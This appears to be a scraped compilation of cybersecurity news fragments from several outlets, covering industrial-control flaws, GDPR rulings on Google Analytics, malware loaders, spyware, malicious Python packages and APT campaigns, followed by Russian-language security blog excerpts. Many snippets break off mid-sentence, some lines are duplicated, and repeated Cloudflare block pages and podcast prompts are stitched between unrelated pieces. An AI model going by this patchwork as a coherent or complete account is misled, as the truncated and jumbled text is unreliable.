"In combination with industrial scenarios on the field, these vulnerabilities could expose industrial production to stagnation, equipment damage, etc."

CODESYS is a software suite used by automation specialists as a development environment for programmable logic controller applications (PLCs).

In a separate advisory published on June 23, CODESYS said it also remediated three other flaws in CODESYS Gateway Server (CVE-2022-31802, CVE-2022-31803, and CVE-2022-31804) that could be leveraged to send cr…

Following the footsteps of Austria and France, the Italian Data Protection Authority has become the latest regulator to find the use of Google Analytics to be non-compliant with E.U.

data protection regulations.

data protection authorities.

Earlier this month, the French data protection watchdog, the CNIL, issued updated guidance over the use of Google Analytics, reiterating the practice as illegal under the General Data Protection Regulation (GDPR) laws and giving affected organizations a period of one month to comply.

It's worth noting that this feature is enabled by default with Google Analytics 4.

A malware-as-a-service (Maas) dubbed Matanbuchus has been observed spreading through phishing campaigns, ultimately dropping the Cobalt Strike post-exploitation framework on compromised machines.

Matanbuchus, like other malware loaders such as BazarLoader, Bumblebee, and Colibri, is engineered to download and execute second-stage executables from command-and-control (C&C) servers on infected systems without detection.

For its part, the Matanbuchus payload establishes a connection to the C&C infrastructure to retrieve next-stage payloads, in this case, two Cobalt Strike Beacons for follow-on activity.

The development comes as researchers from Fortinet FortiGuard Labs disclosed a new variant …

Cybersecurity firms are particularly interested in people who understand the RMF, or Risk Management Framework — a U.S. government guideline for taking care of data.

The NIST Cybersecurity & Risk Management Frameworks Course helps you understand this topic, with over 21 hours of video instruction.

The training is worth a total of $295, but readers of The Hacker News can get the course today for only $39.

Special Offer — Normally priced at $295, this Risk Management Framework course is now only $39 for a limited time, with lifetime access included.

Designed by the United States Government, the Risk Management Framework provides a complete guide to securing sensitive data.

A suspected ransomware intrusion against an unnamed target leveraged a Mitel VoIP appliance as an entry point to achieve remote code execution and gain initial access to the environment.

The exploit in question is tracked as CVE-2022-29499 and was fixed by Mitel in April 2022.

"A vulnerability has been identified in the Mitel Service Appliance component of MiVoice Connect (Mitel Service Appliances – SA 100, SA 400, and Virtual SA) which could allow a malicious actor to perform remote code execution (CVE-2022-29499) within the context of the Service Appliance," the company noted in an advisory.

However, when threat actors exploit an undocumented vulnerability, timely patching becomes irrelev…

A week after it emerged that sophisticated mobile spyware dubbed Hermit was used by the government of Kazakhstan within its borders, Google said it has notified Android users of infected devices.

Additionally, necessary changes have been implemented in Google Play Protect — Android's built-in malware defense service — to protect all users, Benoit Sevens and Clement Lecigne of Google Threat Analysis Group (TAG) said in a Thursday report.

It's not immediately clear who were targeted in the campaign, or which of RCS Lab clients were involved.

"We believe this is the reason why most of the applications masqueraded as mobile carrier applications," the researchers said.

"Basic infection vectors a…

Researchers have discovered a number of malicious Python packages in the official third-party software repository that are engineered to exfiltrate AWS credentials and environment variables to a publicly exposed endpoint.

The list of packages includes loglib-modules, pyg-modules, pygrata, pygrata-utils, and hkg-sol-utils, according to Sonatype security researcher Ax Sharma.

The malicious code injected into "loglib-modules" and "pygrata-utils" allow it to harvest AWS credentials, network interface information, and environment variables and export them to a remote endpoint: "hxxp://graph.pygrata[.]com:8000/upload."

"Were the stolen credentials being intentionally exposed on the web or a conse…

A China-based advanced persistent threat (APT) group is possibly deploying short-lived ransomware families as a decoy to cover up the true operational and tactical objectives behind its campaigns.

The activity cluster, attributed to a hacking group dubbed Bronze Starlight by Secureworks, involves the deployment of post-intrusion ransomware such as LockFile, Atom Silo, Rook, Night Sky, Pandora, and LockBit 2.0.

"The ransomware could distract incident responders from identifying the threat actors' true intent and reduce the likelihood of attributing the malicious activity to a government-sponsored Chinese threat group," the researchers said in a new report.

"The use of HUI Loader to load Coba…

None of the fake apps were found on either Apple’s or Google’s respective mobile app stores, however, they said.

Attackers are sending a link to this malicious app by SMS to try to fool targets into downloading the Hermit spyware.

iOS Campaign RevealedWhile Lookout previously shared details of how Hermit targeting Android devices works, Google TAG revealed specifics of how the spyware functions on iPhones.

In addition to Clieked3, the other bugs exploited are:CVE-2018-4344 internally referred to and publicly known as LightSpeed;CVE-2019-8605 internally referred to as SockPort2 and publicly known as SockPuppet;CVE-2020-3837 internally referred to and publicly known as TimeWaste;CVE-2020-9907…

Advanced persistent threat group Fancy Bear is behind a phishing campaign that uses the specter of nuclear war to exploit a known one-click Microsoft flaw.

Fancy Bear is also known as APT28, Strontium and Sofacy.

Google’s Threat Analysis Group (TAG) said Fancy Bear already has used this stealer to target users in the Ukraine.

The PowerShell loads the final payload–a variant of the .Net stealer previously identified by Google in other Fancy Bear campaigns in the Ukraine.

“The new variant uses the same method but a different domain, www.specialityllc[.]com.

Traditionally, ethical hacking is undertaken by organizations who are looking to uncover security gaps which exist within their corporate network and on company devices.

However, this is only one advantage to ethical hacking.

That is why we must constantly learn and upskill ourselves to be able to defend organizations against these attackers and this is where the gamification of ethical hacking can come into play.

By learning through trial and error, users of ethical hacking platforms often retain skills better than those who participate in textbook training with a series of checkbox exercises.

Gamified platforms and hacking esports are the future.

Researchers discovered 56 vulnerabilities affecting devices from 10 operational technology (OT) vendors, most of which they’ve attributed to inherent design flaws in equipment and a lax approach to security and risk management that have been plaguing the industry for decades, they said.

However, overall the “impact of each vulnerability is high dependent on the functionality each device offers,” according to a blog post about the flaws published Tuesday.

Challenges to Risk ManagementResearchers outlined some of the reasons for the inherent issues with security design and risk management in OT devices that they suggest manufacturers remedy in swift fashion.

Meanwhile, sometimes the inherent …

An advanced persistent threat (APT) group, dubbed ToddyCat, is believed behind a series of attacks targeting Microsoft Exchange servers of high-profile government and military installations in Asia and Europe.

“The first wave of attacks exclusively targeted Microsoft Exchange Servers, which were compromised with Samurai, a sophisticated passive backdoor that usually works on ports 80 and 443,” wrote Giampaolo Dedola security researcher at Kaspersky, in a report outlining the APT.

The attack surface in the third wave is expanded to desktop systems while previously the scope was limited to Microsoft Exchange Servers only.

ToddyCat Activity Extend Over to Chinese APTsAccording to the report, C…

Numerous security risks exist like a poorly configured setting, asset exposures, deviation in security controls, missing security patches, and security posture anomalies.

Numerous security risks exist like a poorly configured setting, asset exposures, deviation in security controls, missing security patches, and security posture anomalies.

Advanced Vulnerability Management provides a broader approach to vulnerabilities and addresses different security risks in the IT vulnerability landscape.

Advanced Vulnerability Management goes beyond traditional vulnerability management practices and looks at vulnerabilities beyond CVEs.

Advanced Vulnerability Management goes beyond traditional vulnerabi…

An agent of the Kazakhstan government has been using enterprise-grade spyware against domestic targets, according to Lookout research published last week.

The government entity used brand impersonation to trick victims into downloading the malware, dubbed “Hermit.” Hermit is an advanced, modular program developed by RCS Lab, a notorious Italian company that specializes in digital surveillance.

It has the power to do all kinds of spying on a target’s phone – not just collect data, but also record and make calls.

In some instances, the attackers also impersonate Samsung and Vivo, according to Lookout.

This allows the actors to authenticate who sent the data as well as ensure the data is uncha…

A reported a “potentially dangerous piece of functionality” allows an attacker to launch an attack on cloud infrastructure and ransom files stored in SharePoint and OneDrive.

Researchers are warning attackers can abuse Microsoft Office 365 functionality to target files stored on SharePoint and OneDrive in ransomware attacks.

Those files, stored via “auto-save” and backed-up in the cloud, typically leave end users with the impression data is shielded from a ransomware attack.

However, researchers say that is not always the case and files stored on SharePoint and OneDrive can be vulnerable to a ransomware attack.

This leads to an account takeover, then discovery of data within the SharePoint …

Attackers are using an oft-used and still effective lure to steal credentials to key Microsoft apps by sending emails notifying potential victims that they have a voicemail message, researchers have found.

In fact, Zscaler itself was one of the organizations targeted in the campaign, which researchers said is similar to one that ThreatLabZ discovered in July 2020.

They use an address in the “From” field that mimics the targeted organization’s name as well as logo branding on the mail itself to appear legitimate.

Analysis conducted by ThreatLabZ on the email headers used in the campaign shows that threat actors used email servers located in Japan to stage attacks, researchers said.

Moreover,…

Researchers from SentinelLabs said the APT, which they dubbed Aoqin Dragon, has been operating since at least 2013.

“Aoqin Dragon seeks initial access primarily through document exploits and the use of fake removable devices,” researchers wrote.

Aoqin Dragon’s Evolving Stealth TacticsPart of what’s helped Aoqin Dragon stay under the radar for so long is that they’ve evolved.

For example, the means the APT used to infect target computers has evolved.

Later, Aoqin Dragon created executable files with desktop icons that made them appear to look like Windows folders or antivirus software.

An advanced persistent threat group, with ties to Iran, is believed behind a phishing campaign targeting high-profile government and military Israeli personnel, according to a report by Check Point Software.

Fake Emails from Legit AddressesOne of the targets, according to Check Point, is Tzipi Livni, Israel’s former foreign minister, minister of justice and vice prime minister.

Good weekThe persistence of the sender and flurry of messages raised her suspicions, according to Check Point.

“The most sophisticated part of the operation is the social engineering,” Sergey Shykevich, threat intelligence group manager at Check Point Research, noted.

He said, the campaign was “a very targeted phishi…

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

With that in mind, here are 5 of the most common ways hackers could get hold of your credit card data – and how to stop them:1.

Scammers may even call you up, again pretending to be a trusted source, with the aim of obtaining your card details.

Some record your keystrokes – for example as you’re typing in card details on an e-commerce or banking site.

These are invisible to the user, but will skim your card details as they are entered.

How to keep your credit card details safeFortunately, there are plenty of ways to mitigate the risk of your card data getting into the wrong hands.

As Instagram tests a new age verification tool, what are some of the concerns when it comes to confirming someone’s age on the internet?

Instagram – which has come under fire in recent years over its potential impact on the mental health of teens – has just announced that it’s testing a new tool for age verification.

Users who attempt to change their age from below 18 to above 18 will need to prove their age, using one of these three options – upload their ID, send a video selfie, or ask three adults to vouch for them.

Available in the United States for now, the new method is designed to help the app better enforce age restrictions and ensure it offers age-appropriate content to its younger…

Since the beginning of the war in Ukraine, for example, the demand for virtual private networks (VPNs) has soared by hundreds of percent both in Ukraine and Russia.

Conceal your browsing information: A VPN will hide your IP address from your ISP and the websites and apps you’re using.

Some VPNs focus on data privacy and others on more complex safety features.

Virtual private networks are not a cure-all, but the more the internet is present in our lives, the more we can benefit from using one.

At any rate, beyond enhancing your privacy and helping protect your sensitive data, VPNs can also make the digital lives of those in conflict regions safer.

But so too is phishing awareness training – which plays a hugely important role in mitigating one of the biggest threats to corporate security today and must be a staple in general cybersecurity awareness training programs.

Phishing attacks have if anything become an even bigger threat over the past two years.

What training tactics work?

A recent global study revealed that security training and awareness for employees is the top spending priority for organizations over the coming year.

Ultimately, phishing awareness training should be just one part of a multi-layered strategy to tackle social engineering threats.

What are crypto mixers, aka crypto tumblers?

Crypto mixers include mainly two types:Centralized mixers: Users introduce their e-wallet addresses on these platforms, and send the specific cryptocurrency amount they want to “mix” to the platform.

Although, as we already noted, crypto mixers are not illegal, it will depend on the country and jurisdiction.

Crypto mixers are not inherently illegal and they can be used for legitimate reasons (although their very use has increasingly been a bit of a red flag for authorities).

Indeed, crypto laundering is becoming increasingly difficult and law enforcement has been able to follow the trail of ill-gotten digital money and take action even against th…

The peak came in March and was in part fueled by the resurgence of the Emotet botnet that spewed out vast amounts of emails with malicious attachments.

With this heightened risk of receiving a malicious email in your inbox, it’s worth taking a moment to consider how to avoid malicious spam in general.

Do you know how to spot such emails?

Watch the video to learn what to look out for and how to stay safe.

Sign up to receive an email update whenever a new article is published in our Ukraine Crisis – Digital Security Resource Center Submit

Emotet malware is back with ferocious vigor, according to ESET telemetry in the first four months of 2022.

Much of this activity involved Word documents tainted with malicious macros.

On the other hand, the file’s zone is contained in a stream that looks like this: filename.txt:Zone.Identifier:$DATA.

First, that users can expect better protection against malicious macros delivered via email.

Second, that spammers like Emotet are adapting their favorite tactics to dupe their future victims.

Industroyer, as they named it, was the first known piece of malware that was developed specifically to target a power grid.

A few days later, ESET malware researcher Anton Cherepanov would start dissecting Industroyer.

On the other hand, considering how sophisticated Industroyer was, its impact was ultimately rather underwhelming, as ESET researchers noted themselves back in 2017.

The work of SandwormThe shenanigans of the malware, ESET researchers noted, mirror the malicious intentions of the people who created it.

ESET researchers assessed with high confidence that Sandworm was again responsible for this new attack.

Here are three themes that stood out at the world’s largest gathering of cybersecurity professionalsHaving just come back from the RSA Conference 2022, Tony looks at three themes that stood out to him at the world’s largest gathering of cybersecurity professionals:the shortage of cybersecurity talent and its ramificationshow technology companies attempt to fill this void by automating many processes so that security teams can focus on critical issueshow despite the competition between companies, the cybersecurity industry remains united in pursuing its shared objective – to protect against cyberthreatsWatch the video to find out more.

All this – and more – on WeLiveSecurity.com.

Connect wit…

Because an API-based data transfer is so rapid, there’s but little time to prevent very bad things happening quickly.

Here at the RSA Conference, several sessions and vendors have tried to get us to wrap our heads around how to plug these often ill-secured digital holes.

To protect your APIs, you have to find their vulnerabilities before they bad guys do.

For instance, APIs expect blocks of structured data that fits some interoperable standard that’s easily digestible by other computer systems.

Sign up to receive an email update whenever a new article is published in our Ukraine Crisis – Digital Security Resource Center Submit

Not real in a good sense – real in the sense that we’d better get the tech right so people can avoid dying.

That kind of infrastructure is the kind of thing we need to protect now, it just keeps getting more real.

And some people who respond are moved enough to send money to help defend yourself with real kinetic weapons.

We need to think about the seriousness that tech will play and build accordingly; we need to ramp up for success.

That’s kind of what the RSA Conference focuses on, growing up and being digital adults.

Fifteen years ago, no one thought much about healthcare device security, or hospital digital security in general.

Many of the same devices in use today in health organizations were designed, built and rolled out for medical use 15 years ago.

If they had the appetite, new medical devices are devilishly expensive – who will pay for that bill?

Except holistically integrating patient health to a single pane of glass is a wonderful thing that can reduce staff time dramatically.

Sign up to receive an email update whenever a new article is published in our Ukraine Crisis – Digital Security Resource Center Submit

Let’s say you want to get into a jilted partner’s insurance policy and file a fake claim.

Right now it’s not obvious this kind of thing would get flagged, especially when paired with reasonable social engineering chops.

Not that you have the kind of time it takes to make a good fake, because while the good ones are getting very good indeed, the bad ones won’t convince anyone.

With deep fakes, you can train your fake against real facial recognition apps until you get it right.

Sign up to receive an email update whenever a new article is published in our Ukraine Crisis – Digital Security Resource Center Submit

The key is rolling out an effective security awareness training program.

What is security awareness training?

Awareness training is perhaps not the best moniker for what IT and security leaders want to achieve in their programs.

Several trends highlight the urgent need for security awareness training programs:Passwords: Static credentials have been around for as long as computer systems.

Many regulations like HIPAA, PCI DSS and Sarbanes-Oxley (SOX) require complying organizations to run employee security awareness training programs.

A review of the key trends that defined the threatscape in the first four months of 2022 and what these developments mean for your cyber-defensesAs the ESET research team released its T1 2022 Threat Report this week, Tony reviews the key trends and developments that defined the threat landscape in the first four months of this year.

Overall threat detections grew by 20 percent compared to the previous four months, but which categories of threats grew the most and which trended down?

Just as importantly, what kinds of implications does this have for your cyber-defenses?

All this – and more – on WeLiveSecurity.com.

Sign up to receive an email update whenever a new article is published in our …

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

S3 Ep86: The crooks were in our network for HOW long?!

[Podcast + Transcript]

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

VMware unveiled VMware vSphere+ and VMware vSAN+ to help organizations bring the benefits of the cloud to their existing on-premises infrastructure with no disruption to their workloads or hosts.

These new offerings will help customers enhance their infrastructure by providing centralized cloud-based infrastructure management, integrated Kubernetes, access to new hybrid cloud services, and a flexible subscription model.

“VMware vSphere+ and VMware vSAN+ represent the next major evolution of those foundational solutions that customers know and trust,” said Krish Prasad, senior vice president and general manager for VMware Cloud Platform Business, Cloud Infrastructure Business Group, VMware.

…

Nasuni announced it has acquired Storage Made Easy (SME), a file data management company that offers remote work and compliance solutions for cloud file storage.

One of today’s biggest challenges for data storage is the ability to make files accessible to users no matter where they are.

Traditional Network Attached Storage (NAS) does a poor job accommodating file access from anywhere and stores file data in silos making search and analytics impossible.

It uniquely leverages object storage from Azure, AWS and Google Cloud to transform legacy file infrastructure with a suite of file data services that enables files to be accessed from anywhere and protected from anything.

“When the pandemic h…

(ISC)² published findings from its 2022 Cybersecurity Hiring Managers research that shed light on best practices for recruiting, hiring and onboarding entry- and junior-level cybersecurity practitioners.

“With a global cybersecurity workforce gap of 2.7 million people, organizations must be creative with their cybersecurity hiring.

But that doesn’t mean they have to take more hiring risks,” said Clar Rosso, CEO, (ISC)².

Peer Software announced the formation of a strategic alliance with Pulsar Security.

Through the alliance, Peer Software will leverage Pulsar Security’s team of cyber security experts to continuously monitor and analyze emerging and evolving ransomware and malware attack patterns on unstructured data.

“Each ransomware and malware attack is encoded to infiltrate and propagate through a storage system in a unique manner that gives it a digital fingerprint,” said Duane Laflotte, CTO, Pulsar Security.

We are excited to be working with Peer Software on this unique capability.”As part of the agreement, Pulsar Security will also work with Peer Software to educate and inform enterprise customers on …

The risks presented by ransomware and cyber extortion events have likely found a place in your own security team’s discussions, and rightfully so.

Ransomware attacks have proliferated in the last decade.

Create an Incident Response playbook that contains all relevant information related to responding to a ransomware attack.

IsolationTo limit its spread, isolation should be your organization’s first priority after you realize a ransomware attack is targeting your organization.

Involving law enforcement early on in a ransomware attack is highly recommended.

In this video for Help Net Security, Andy Thompson, Global Research Evangelist at CyberArk, talks about Wi-Fi security.

He walks you through various protocols we see in the wild, and introduces specific hacking techniques to crack Wi-Fi passwords.

CyberArk researchers have already proven the ease with which attackers can access Wi-Fi networks, having recently gone on wardriving exercises in San Francisco, Dallas and Tel Aviv to uncover how many Wi-Fi networks could be could cracked using readily-available and cheap equipment.

“Most security and risk leaders now recognize that major disruption is only one crisis away.

The term zero trust is now prevalent in security vendor marketing and in security guidance from governments.

However, only 23% of security and risk leaders monitor third parties in real time for cybersecurity exposure, according to Gartner data.

Gartner recommends engaging a professional incident response team as well as law enforcement and any regulatory body before negotiating.

With continued disruption likely, Gartner recommends that risk leaders recognize organizational resilience as a strategic imperative and build an organization-wide resilience strategy that also engages staff, stakeholders, …

Abnormal Security released new research that showcases a rising trend in financial supply chain compromise as threat actors impersonate vendors more than ever before.

In May 2022, external, third-party impersonation made up 52% of all BEC attacks seen by Abnormal, while internal impersonation fell to 48% of all attacks.

Just one year prior, internal impersonation accounted for 60% of all attacks—marking a 30% year over year increase in third-party impersonation.

“While financial supply chain compromise is not new, the increase in using third-party impersonation tactics is worrisome,” states Crane Hassold, director of threat intelligence at Abnormal Security.

Said Hassold, “This shift to fin…

Many APIs connect directly to backend databases where sensitive data is stored.

As a result, hackers are increasingly targeting APIs as a pathway to the underlying infrastructure to exfiltrate sensitive information.

Further, by automating API inventory, the security team will have visibility into when developers modify APIs in production.

Further, by automating API inventory, the security team will have visibility into when developers modify APIs in production.

Until then, cybercriminals will continue to exploit vulnerable APIs to exfiltrate sensitive data in greater volumes.”

MITRE has promoted Beth Meinert from vice president to Senior Vice President and General Manager, MITRE Public Sector (MPS) after a competitive search for the role.

“Given her impactful career at MITRE, I’m proud to commend Beth on this executive leadership role.

She has been both a pioneer and leader throughout MITRE’s continued transformation, leaning forward in developing whole-of-nation solutions beyond our traditional national security focus,” said Jason Providakes, MITRE president and CEO.

Meinert brings diverse experience in business, technology, finance, economics, and public service, and continues to serve as the officer champion for all MITRE veterans through her work with the Vet…

Hexagon AB announced that Paolo Guglielmini will succeed Ola Rollén as President and CEO of Hexagon AB, effective 31 December 2022.

Paolo Guglielmini, currently Hexagon’s Chief Operating Officer (COO) and President of Hexagon’s Manufacturing Intelligence (MI) division, has served in key roles since joining Hexagon in 2010, from strategy and business development to M&A and general management.

Prior to joining Hexagon, Guglielmini held positions at CERN, the European Organization for Nuclear Research in Switzerland, and Accenture.

Since joining Hexagon in 2000, he has grown the company from 150 MEUR market cap to a 30bn EUR multinational leader in digital solutions.

Weiss will report to Hexag…

XM Cyber announced the acquisition of Cyber Observer, an innovator in Continuous Controls Monitoring (CCM) and Cloud Security Posture Management (CSPM).

This marks the latest growth milestone for XM Cyber in a year that has found the company significantly increasing its leadership position in the cybersecurity industry.

In November 2021, Schwarz acquired XM Cyber as its cyber arm.

Since then, XM Cyber has extended its portfolio of solutions, expanded its workforce globally, and increased its customer base.

“Cyber Observer’s patented continuous control monitoring capabilities are a perfect complement to XM Cyber’s award-winning hybrid cloud security platform,” said Shimon Becker, co-founder …

Sonatype researchers have discovered Python packages that contain malicious code that peek into and expose secret AWS credentials, network interface information, and environment variables.

All those credentials and metadata then get uploaded to one or more endpoints, and anyone on the web can see this.

Going up a directory level showed hundreds of TXT files containing sensitive information and secret.

In this Help Net Security video, Ax Sharma, Senior Security Researcher at Sonatype, explains the situation in more detail.

Now the bad news: existing third party risk programs typically do not assess security risk in OT environments.

In fact, although frameworks and best practices are emerging in OT security, organizations usually need to rely on OT security experts to assist in these assessments and remediation recommendations.

The biggest problem in OT security is the cultural divide between IT and OT.

The OT security field is much less mature, lacking people with OT security experience, established best practices and frameworks, and with a much smaller selection of security technologies.

Conduct a workshop with representatives from IT, IT security, OT managers, OT engineers, and IT/security personnel from OT.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

Месячник молчания закончен - спешу сообщить, что блог переехал на новый домен - lukatsky.ru, где мы с вами и встретимся :-)Тут всем пока, а там всем привет!

И с международным днем защиты информации!!

РКН со своим 1046-м Постановление Правительства по надзору в области персональных данных тоже накосячил - и в расширительном толковании отдельных терминов, и синтаксических ошибках.

И это только три примера, которые достаточно свежие и от разных регуляторов, но их ведь гораздо больше.

Надо сказать, что это не совсем проблема регулятора, что у нас исторически все боятся сказать что-то против политики партии, но и его тоже - он же поощряет ее.

Поэтому только публичная активность, но на это рассчитывать не приходится - не приучен у нас регулятор к публичной критике, а еще и отомстить может.

Пятый вариант заключается в том, чтобы попробовать сферического коня в вакууме в своем загоне, то есть в…

Решил я тут раскрыть чуть больше краткую заметку в своем Telegram, посвященную моделированию угроз в процессе разработки ПО.

Я написал следующее: "Методика оценки угроз ФСТЭК не применяется при моделировании угроз в рамках безопасной разработки.

А, в конце концов, нарушение правил контроля доступа, которое отвечает за 10 из 30 основных проблем безопасности ПО?

Ее, кстати, нет и в текущей методике оценки угроз, что ставить нас перед непростой задачей - какую из актуальных угроз нейтрализовывать первой, какую второй, какую третьей и т.д.

А пока я остаюсь при своем мнении относительно того, что пока у нас нет методики оценки угроз в рамках процесса безопасной разработки.

Одни высказывались в пользу того, что не дело ИБ следить за тем, как тратится рабочее время компании.

Да, возможно слежение за рабочим времени - это не функция ИБ (что не мешает ИБ-вендорам активно допиливать свои решения именно для этой задачи).

Но не стоит забывать, что ИБ - это не только функция, но и инструмент, который может быть использован и другими подразделениями для их задач.

Да, ИБ может не приносить дохода, но при этом влиять на снижение расходов, тем самым увеличивая прибыль предприятия.

И дело не только и не столько в том, чтобы снижать стоимость инцидентов или предотвращать мошенничество, о чем мы тоже говорили.

Вторым круглым столом на конференции "Кибербезопасность нового времени", проведенной Innostage в рамках казанской DigitalWeek, был "Формальная безопасность vs практическая безопасность: как достичь синергии", который получился не таким, как я его задумывал изначально, готовя вопросы.

Почему об этом нигде не говорится и зачем вообще тогда надо было принимать документ, который нормально и не применить и меньше через год надо повторять процедуру (а деньги где брать)?

А все потому, что этот стандарт имеет пометку "для служебного пользования".

И как тут быть?

ФСТЭК говорила на мероприятиях, что у них есть ОКИИ (научной деятельностью они же занимаются в том же Воронеже).

Она сообщила, что заявленный план перехода объектов КИИ на российское ПО и оборудование к 2023-2024 г. выглядит красиво, но нереалистично.

Возможно в Газпромнефти и Энергоатоме разные ПО и железо, но я из практики тоже больше склоняюсь к позиции Лилии Загородных.

Если государство думает, что иностранные игроки всеми конечностями будут жержаться за российский рынок и довольствооваться подачками, то это не так.

И в тучные времена доля России в объеме бизнеса иностранных ИТ и ИБ-компаний составляла около 1%.

И это правда.

К этому выступлению я планировал завершить перевод последней версии матрицы MITRE ATT&CK v9 на русский язык и маппинг техник ФСТЭК в техники MITRE ATT&CK, что и было сделано (ссылки будут ниже).

Поэтому я и задался целью связать то, что принято во всем мире как стандарт де-факто (пусть и неидеальный) и что требует делать ФСТЭК.

Второй и, наверное, более серьезной задачей было найти соответствие между 145 техниками ФСТЭК и 400+ техник MITRE ATT&CK.

В октябре должна быть анонсирована новая, 10-я версия, MITRE ATT&CK и я планирую обновить свои переводы и маппинг.

Кроме того, у меня в планах перевести матрицу ATT&CK for ICS, провести маппинг техник ФСТЭК с ней, а также провести обратный маппинг…

И ты выходишь весь оплеванный и не знаешь, как обосновать выделение ресурсов.

Идея заключается в том, что мы должны выписать все функции, которые нам нужны для обеспечения ИБ в табличку и против каждой функции проставить число часов, которые эта функция требует.

Очевидно, что чем крупнее организация, тем больше функций ИБ в ней реализуется и тем больше времени на них нужно.

Но в данном примере нам нужно 140 часов в неделю, что при 40 рабочих часах по Трудовому Кодексу составит 3,5 FTE (Full-Time Equivalent).

Допустим, вы банк и вам "навесили" обеспечение непрерывной надежности и уведомление ФинЦЕРТ об инцидентах ИБ, а ИТ сбагрила вам проект по идентификации и аутентификации.

Почему мало кто из ИБшников или ИБшных сейлов пишет о своих измеримых достижениях в резюме?

По ним оценивается специалист, а не по тому какому КОИБАСу его учили старперы по учебникам времен Петра Первого.

Как правильно отметила в заметке Екатерина Калугина, большинство соискателей в резюме пишут, что делали (а это у многих схожих по роли специалистов очень похоже), а не что сделали.

Писать резюме - несложная штука, научиться сильно проще, чем обращаться с PowerPoint" и я с ним согласен.

О том, как писать резюме можно писать еще много, но я не ставил перед собой такую задачу.

Обновил и опубликовал на Slideshare свою презентацию про стандарты и руководства по управлению ИБ при взаимодействии с поставщиками. Supply management 1.1.pdf from Andrey Prozorov, CISM

Опубликовал на SlideShare несколько своих старых презентаций по GDPR и Privacy:All about a DPIA - https://www.slideshare.net/AndreyProzorov/all-about-a-dpia-by-andrey-prozorov-20-220518pdfEmployee Monitoring and Privacy - https://www.slideshare.net/AndreyProzorov/employee-monitoring-and-privacypdfGDPR and Personal Data Transfers - https://www.slideshare.net/AndreyProzorov/gdpr-and-personal-data-transfers-11pdfGDPR and Security - https://www.slideshare.net/AndreyProzorov/gdpr-and-securitypdfGDPR RACI - https://www.slideshare.net/AndreyProzorov/gdpr-racipdfGDPR EU Institutions and bodies - https://www.slideshare.net/AndreyProzorov/gdpr-eu-institutions-and-bodiespdf

Я люблю и использую майндкарты уже 15 лет, а недавно обновил свою "Майндкарту о майндкартах", теперь она на английском языке.Скачать ее в PDF и Xmind можно тут - https://www.patreon.com/posts/65251502 или тут - https://boosty.to/isms8020/posts/c69bdcee-f0eb-48be-ab4a-29b1f84d1996А посмотреть прошлый вариант на русском языке тут - https://80na20.blogspot.com/2012/07/blog-post_10.html

